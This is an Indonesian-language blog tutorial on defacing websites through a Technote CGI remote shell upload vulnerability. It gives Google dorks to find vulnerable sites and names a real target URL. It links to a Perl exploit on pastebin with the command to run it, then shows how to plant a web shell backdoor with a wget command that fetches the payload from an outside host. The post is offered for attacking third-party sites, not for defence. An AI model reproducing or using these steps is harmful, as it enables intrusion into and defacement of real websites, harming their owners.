Tutorial Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

Posted by : DindaKyuut Rabu, 17 Januari 2018

Hallo mina disini saya akan share tutorial deface Teknik RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability 

Tidak Usah Basa Basi Langsung Aja Ke TKP..........

Pertama Kita Dorking Dulu Webnya 
Google Dork 1 : inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"  
intext:"TECHNOTE-TOP"
kembangkan lagi bang biar banyak yang perawan



disini saya sudah mempunyai target :)
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD&number=20&view=2&howmanytext= 
kita ambil linknya sampe FREE_BOARD SAJA  
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD

Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :)




https://pastebin.com/raw/jb4Zf0kn 

Ubah Ekstensi Menjadi pl karena ini codingan perl

gimana sih cara jalanin toolsnya ?
anda bisa menggunakan xampp  
karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3

Langkah Selanjutnya 
Buka Terminalnya 
 

kalian cukup ketik perintah / copy : 
perl namafile.pl target 

 

Enter Maka Hasilnya Akan Seperti Ini
 

itu berati vuln ? tidak semua yang vuln bisa ditanem shell/file lainnya
disini kita akan tanem shell dengan menggunakan direct txt ke php
gimana sih caranya ?

setelah ss di atas ketik perintah ls < untuk menampilkan folder folder / file yang ada di web tersebut 

 

maka hasilnya akan seperti diatas
setelah itu anda tinggal masuk ke salah satu folder diatas
disini saya akan masuk ke folder board 
dengan ketik perintah cd board

 

maka hasilnya akan seperti ini 
nah disini yang akan kita lakukan untuk menanem shell backdor anda bisa menggunakan shell backdor yang berada di web kami yang ber eks .txt

gimana sih ko txt bisa diubah ke php  ?

dengan ketik perintah diterminal
wget http://showbizz98.com/tc.txt -O kontol.php < nah itu kontol.php adalah untuk mengubah shell txt ke php 


jika berhasil maka hasilnya akan seperti ss di atas 
bang dimana sih letak shell nya :'( ?
kan tadi sebelumnya kita sudah masuk folder kita ambil aja contoh link di atas /cgi_bin/board/namashell.php
SUMBER : TATSUMI CREW

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Navigation

Copyright

©2018

Popular Posts

Diberdayakan oleh Blogger.

Followers

- Copyright © X-CHEAT-VIP - Simple Theme - Powered by Blogger - Designed by Abdul ithansyah -